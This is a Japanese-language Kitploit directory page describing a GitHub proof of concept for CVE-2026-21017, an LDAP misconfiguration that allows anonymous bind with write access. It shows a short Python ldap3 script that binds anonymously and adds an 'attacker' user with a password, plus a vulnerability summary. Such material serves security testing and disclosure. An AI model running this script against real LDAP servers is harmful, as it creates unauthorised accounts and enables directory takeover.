Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-21017-LDAP-Anonymous-Bind-Privilege-Escalation — LDAP匿名バインドの権限昇格を実証するPython概念実証(PoC)コード。認証されていないLDAPバインドを介して管理者ユーザーを作成する、安全でないACLをシミュレートします。 | Kitploit
ツール/GitHubGitHub/george0papasotiriou/cve-2026-21017-ldap-anonymous-bind-privilege-escalation
認証と認可特権昇格脆弱性分析エクスプロイトペネトレーションテスト設定ミス
GitHubgeorge0papasotiriou/cve-2026-21017-ldap-anonymous-bind-privilege-escalation

CVE-2026-21017-LDAP-Anonymous-Bind-Privilege-Escalation

LDAP匿名バインドの権限昇格を実証するPython概念実証(PoC)コード。認証されていないLDAPバインドを介して管理者ユーザーを作成する、安全でないACLをシミュレートします。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
17日前未レビュー

CVE-2026-21017 – LDAP 匿名バインド特権昇格

プログラムコード (Python ldap3 シミュレーション)

root@kitploit:~
# ldap_anon_sim.py - LDAP server allowing anonymous bind with write access
from ldap3 import Server, Connection, ALL

# Simulated: real server would be misconfigured
server = Server('ldap://localhost:389', get_info=ALL)
conn = Connection(server, authentication='ANONYMOUS')
conn.bind()
# If anonymous has write permission to userPassword, can add self as admin
conn.add('uid=attacker,ou=people,dc=example,dc=com', ['inetOrgPerson'], {'uid': 'attacker', 'userPassword': 'password'})
print("User created anonymously!")

CVE-2026-21017 – LDAP 匿名バインド特権昇格

Severity: Critical

概要

LDAP ディレクトリが誤って設定され、匿名バインドが許可され、さらに機密属性(userPassword など)への書き込みアクセスが付与されています。攻撃者は匿名でバインドし、新しい管理者ユーザーを作成して特権を昇格させることができます。

脆弱性の詳細

  • タイプ: 不十分なアクセス制御
  • 影響: ディレクトリ全体の侵害。
  • 根本原因: アクセス制御リスト (ACL) が認証済みユーザーへの書き込みを制限していません。

エクスプロイトのデモ

シミュレーションを実行します(実際のテストには実 LDAP サーバーが必要ですが、コンセプトを示しています):

root@kitploit:~
python ldap_anon_sim.py

このスクリプトは匿名でユーザーを追加しようとします。

ツールをダウンロード